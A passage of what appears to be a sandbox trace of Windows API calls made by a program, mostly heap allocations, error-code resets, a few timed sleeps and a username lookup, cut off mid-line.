Size=0x16) returned 0x29a1d78 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x2a) returned 0x29a1d98 [0081.578] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x29) returned 0x29a1dd0 [0081.579] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x12) returned 0x29a1e08 [0081.579] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x21) returned 0x29a1e28 [0081.579] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x16) returned 0x29a1e58 [0081.579] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x22) returned 0x29a1e78 [0081.579] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x12) returned 0x29a1ea8 [0081.579] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0fd0 | out: hHeap=0x29a0000) returned 1 [0081.683] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x80) returned 0x29a1ec8 [0081.684] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x800) returned 0x29a1f50 [0081.684] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0081.684] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.685] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aaac4) returned 0x0 [0081.685] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.801] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.801] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.802] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.802] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.802] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.802] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.803] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.918] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.918] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.918] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.919] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.919] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.919] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.919] RtlSizeHeap (HeapHandle=0x29a0000, Flags=0x0, MemoryPointer=0x29a1ec8) returned 0x80 [0081.920] GetLastError () returned 0x0 [0081.920] SetLastError (dwErrCode=0x0) [0081.920] GetLastError () returned 0x0 [0081.920] SetLastError (dwErrCode=0x0) [0081.920] GetLastError () returned 0x0 [0081.920] SetLastError (dwErrCode=0x0) [0081.920] GetLastError () returned 0x0 [0081.920] SetLastError (dwErrCode=0x0) [0081.920] GetLastError () returned 0x0 [0081.920] SetLastError (dwErrCode=0x0) [0081.920] GetLastError () returned 0x0 [0081.921] SetLastError (dwErrCode=0x0) [0081.921] GetLastError () returned 0x0 [0081.921] SetLastError (dwErrCode=0x0) [0081.921] GetLastError () returned 0x0 [0081.921] SetLastError (dwErrCode=0x0) [0081.921] GetLastError () returned 0x0 [0081.921] SetLastError (dwErrCode=0x0) [0081.921] GetLastError () returned 0x0 [0081.921] SetLastError (dwErrCode=0x0) [0081.921] GetLastError () returned 0x0 [0081.921] SetLastError (dwErrCode=0x0) [0081.921] GetLastError () returned 0x0 [0081.921] SetLastError (dwErrCode=0x0) [0081.921] GetLastError () returned 0x0 [0081.921] SetLastError (dwErrCode=0x0) [0081.921] GetLastError () returned 0x0 [0081.921] SetLastError (dwErrCode=0x0) [0081.921] GetLastError () returned 0x0 [0081.921] SetLastError (dwErrCode=0x0) [0081.921] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] GetLastError () returned 0x0 [0081.923] SetLastError (dwErrCode=0x0) [0081.923] GetLastError () returned 0x0 [0081.923] SetLastError (dwErrCode=0x0) [0081.923] GetLastError () returned 0x0 [0081.923] SetLastError (dwErrCode=0x0) [0081.923] GetLastError () returned 0x0 [0081.923] SetLastError (dwErrCode=0x0) [0081.923] GetLastError () returned 0x0 [0081.923] SetLastError (dwErrCode=0x0) [0081.923] GetLastError () returned 0x0 [0081.923] SetLastError (dwErrCode=0x0) [0081.923] GetLastError () returned 0x0 [0081.923] SetLastError (dwErrCode=0x0) [0081.923] GetLastError () returned 0x0 [0081.923] SetLastError (dwErrCode=0x0) [0081.923] GetLastError () returned 0x0 [0081.923] SetLastError (dwErrCode=0x0) [0081.923] GetLastError () returned 0x0 [0081.923] SetLastError (dwErrCode=0x0) [0081.923] GetLastError () returned 0x0 [0081.923] SetLastError (dwErrCode=0x0) [0081.924] GetLastError () returned 0x0 [0081.924] SetLastError (dwErrCode=0x0) [0081.924] GetLastError () returned 0x0 [0081.924] SetLastError (dwErrCode=0x0) [0081.924] GetLastError () returned 0x0 [0081.924] SetLastError (dwErrCode=0x0) [0081.924] GetLastError () returned 0x0 [0081.924] SetLastError (dwErrCode=0x0) [0081.924] GetLastError () returned 0x0 [0081.924] SetLastError (dwErrCode=0x0) [0081.924] GetLastError () returned 0x0 [0081.924] SetLastError (dwErrCode=0x0) [0081.924] GetLastError () returned 0x0 [0081.924] SetLastError (dwErrCode=0x0) [0081.924] GetLastError () returned 0x0 [0081.924] SetLastError (dwErrCode=0x0) [0081.924] GetLastError () returned 0x0 [0081.925] SetLastError (dwErrCode=0x0) [0081.925] GetLastError () returned 0x0 [0081.925] SetLastError (dwErrCode=0x0) [0081.925] GetLastError () returned 0x0 [0081.925] SetLastError (dwErrCode=0x0) [0081.925] GetLastError () returned 0x0 [0081.925] SetLastError (dwErrCode=0x0) [0081.925] GetLastError () returned 0x0 [0081.925] SetLastError (dwErrCode=0x0) [0081.925] GetLastError () returned 0x0 [0081.925] SetLastError (dwErrCode=0x0) [0081.925] GetLastError () returned 0x0 [0081.925] SetLastError (dwErrCode=0x0) [0081.925] GetLastError () returned 0x0 [0081.925] SetLastError (dwErrCode=0x0) [0081.925] GetLastError () returned 0x0 [0081.925] SetLastError (dwErrCode=0x0) [0081.925] GetLastError () returned 0x0 [0081.925] SetLastError (dwErrCode=0x0) [0081.925] GetLastError () returned 0x0 [0081.925] SetLastError (dwErrCode=0x0) [0081.926] GetLastError () returned 0x0 [0081.926] SetLastError (dwErrCode=0x0) [0081.926] GetLastError () returned 0x0 [0081.926] SetLastError (dwErrCode=0x0) [0081.926] GetLastError () returned 0x0 [0081.926] SetLastError (dwErrCode=0x0) [0081.926] GetLastError () returned 0x0 [0081.926] SetLastError (dwErrCode=0x0) [0081.926] GetLastError () returned 0x0 [0081.926] SetLastError (dwErrCode=0x0) [0081.926] GetLastError () returned 0x0 [0081.926] SetLastError (dwErrCode=0x0) [0081.926] GetLastError () returned 0x0 [0081.926] SetLastError (dwErrCode=0x0) [0081.926] GetLastError () returned 0x0 [0081.926] SetLastError (dwErrCode=0x0) [0081.926] GetLastError () returned 0x0 [0081.926] SetLastError (dwErrCode=0x0) [0081.926] GetLastError () returned 0x0 [0081.926] SetLastError (dwErrCode=0x0) [0081.927] GetLastError () returned 0x0 [0081.927] SetLastError (dwErrCode=0x0) [0081.927] GetLastError () returned 0x0 [0081.927] SetLastError (dwErrCode=0x0) [0081.927] GetLastError () returned 0x0 [0081.927] SetLastError (dwErrCode=0x0) [0081.927] GetLastError () returned 0x0 [0081.927] SetLastError (dwErrCode=0x0) [0081.927] GetLastError () returned 0x0 [0081.927] SetLastError (dwErrCode=0x0) [0081.927] GetLastError () returned 0x0 [0081.927] SetLastError (dwErrCode=0x0) [0081.927] GetLastError () returned 0x0 [0081.927] SetLastError (dwErrCode=0x0) [0081.927] GetLastError () returned 0x0 [0081.927] SetLastError (dwErrCode=0x0) [0081.927] GetLastError () returned 0x0 [0081.927] SetLastError (dwErrCode=0x0) [0081.927] GetLastError () returned 0x0 [0081.927] SetLastError (dwErrCode=0x0) [0081.927] GetLastError () returned 0x0 [0081.927] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.928] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.928] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.928] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.928] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.928] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.928] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.928] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.928] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.928] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.928] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.928] SetLastError (dwErrCode=0x0) [0081.928] GetLastError () returned 0x0 [0081.929] SetLastError (dwErrCode=0x0) [0081.929] GetLastError () returned 0x0 [0081.929] SetLastError (dwErrCode=0x0) [0081.929] GetLastError () returned 0x0 [0081.929] SetLastError (dwErrCode=0x0) [0081.929] GetLastError () returned 0x0 [0081.929] SetLastError (dwErrCode=0x0) [0081.929] GetLastError () returned 0x0 [0081.929] SetLastError (dwErrCode=0x0) [0081.929] GetLastError () returned 0x0 [0081.929] SetLastError (dwErrCode=0x0) [0081.929] GetLastError () returned 0x0 [0081.929] SetLastError (dwErrCode=0x0) [0081.929] GetLastError () returned 0x0 [0081.929] SetLastError (dwErrCode=0x0) [0081.929] GetLastError () returned 0x0 [0081.929] SetLastError (dwErrCode=0x0) [0081.929] GetLastError () returned 0x0 [0081.929] SetLastError (dwErrCode=0x0) [0081.929] GetLastError () returned 0x0 [0081.929] SetLastError (dwErrCode=0x0) [0081.929] GetLastError () returned 0x0 [0081.930] SetLastError (dwErrCode=0x0) [0081.930] GetLastError () returned 0x0 [0081.930] SetLastError (dwErrCode=0x0) [0081.933] Sleep (dwMilliseconds=0x6f) [0082.158] Sleep (dwMilliseconds=0x22b) [0082.745] Sleep (dwMilliseconds=0x14d) [0083.102] Sleep (dwMilliseconds=0x6f) [0083.231] Sleep (dwMilliseconds=0x22b) [0083.835] Sleep (dwMilliseconds=0x14d) [0084.198] GetUserNameA (in: lpBuffer=0x19f96c, pcbBuffer=0x19f968 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19f968) returned 1 [0084.208] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6efd28 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0f08 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6f0f18 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6efd40 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x6ddb90 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6f0e48 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x6ffbf8 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6efd70 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6f0e98 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6ddd30 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x6ddd50 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0f28 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6efaa0 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6efab8 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6efc38 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x6f1c48 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6efad0 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6efae8 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6efb30 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6efb90 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6efba8 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6efbc0 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x6ddef0 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6d9fa0 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6f0370 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6f0220 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6f0400 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6f02c8 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6f0208 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f03a0 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6f0f38 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0e68 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0f78 [0084.209] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6f03b8 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0e78 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6f0358 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f0178 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f03d0 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6f0250 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0ea8 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6f0190 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6f0310 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6f0430 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6f01c0 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6f0388 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6ddbf0 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0f88 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f01a8 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6f0f98 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x3) returned 0x6f09c0 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6f03e8 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0a80 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6f0b30 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0a00 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6f0ad0 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6f0418 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x6f0b10 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f01f0 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6f02b0 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6f0238 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x6ddd90 [0084.210] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f0268 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6f0280 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x6f1ae0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x6f1c70 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6f0298 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x4b) returned 0x6dd128 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f0148 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f0160 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f02e0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x6dddb0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x6dddf0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6f0aa0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x2a) returned 0x6dd6c0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x3e) returned 0x6d3418 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x21) returned 0x6fbb10 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x60) returned 0x7009a0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x2b) returned 0x6dd308 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x6f17c0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x75) returned 0x6ce1d8 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6f02f8 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x2d) returned 0x6dd458 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6f0960 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6f0ab0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6f09f0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x6f17e8 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6ddc30 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x26) returned 0x6fbde0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6f01d8 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6f0af0 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6f0328 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f0340 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x6ddc50 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x2b) returned 0x6dd650 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0b20 [0084.211] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f0538 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6f0718 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6f04a8 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x6f1900 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x6dde30 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x6f1810 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6f0688 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x2b) returned 0x6dd340 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6f0ae0 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x2a) returned 0x6dd3b0 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6f04d8 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6ddc70 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x6dde50 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6f0628 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x6f18b0 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6f05b0 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x2b) returned 0x6dd688 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6f04c0 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x6dde70 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6f0640 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x21) returned 0x6fbfc0 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6f0700 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x2a) returned 0x6dd848 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6f0a50 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x6f1798 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6f04f0 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6f06a0 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f05f8 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x6f19c8 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6f0508 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x7011d0 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6f0a40 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x701110 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6f0950 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x701210 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6f0ac0 [0084.212] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x701330 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0b00 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x701350 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f0520 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x6f1860 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6f06b8 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x701450 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6f06d0 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x701230 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0b40 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x701370 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x701390 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x21) returned 0x6fbbd0 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0970 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x7013b0 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6f0a60 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x6f1888 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6f0a20 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x6f18d8 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6f06e8 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x7012f0 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f0478 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x701130 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x7013f0 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x1d) returned 0x6f19f0 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6f0568 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x7013d0 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f0490 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x7011f0 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x6f0550 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x1d) returned 0x6f1a40 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6f0730 [0084.213] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x701410 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6f0a30 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0980 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6f09e0 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x701430 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6f05e0 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x6f1d10 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6f0448 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x1f) returned 0x6f1d88 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6f0580 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x1e) returned 0x6f1ef0 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6f0a70 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x1e) returned 0x6f1ce8 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f0a10 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x21) returned 0x6fba80 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6f0598 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6f09b0 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6f05c8 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6f0a90 [0084.217] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6f0990 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x6f1ea0 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x7011b0 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x6dcdb8 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x6f1f40 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6f0610 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f0658 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6f0670 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f0460 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f08f8 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6f0868 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6f0760 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x1d) returned 0x6f1f18 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x701250 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x6f1c98 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x701170 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x6f1d38 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f07f0 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6f0748 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x701150 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x701470 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x701270 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6f0898 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6f0778 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x7012b0 [0084.218] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6f08b0 [0084.218] LocalAlloc 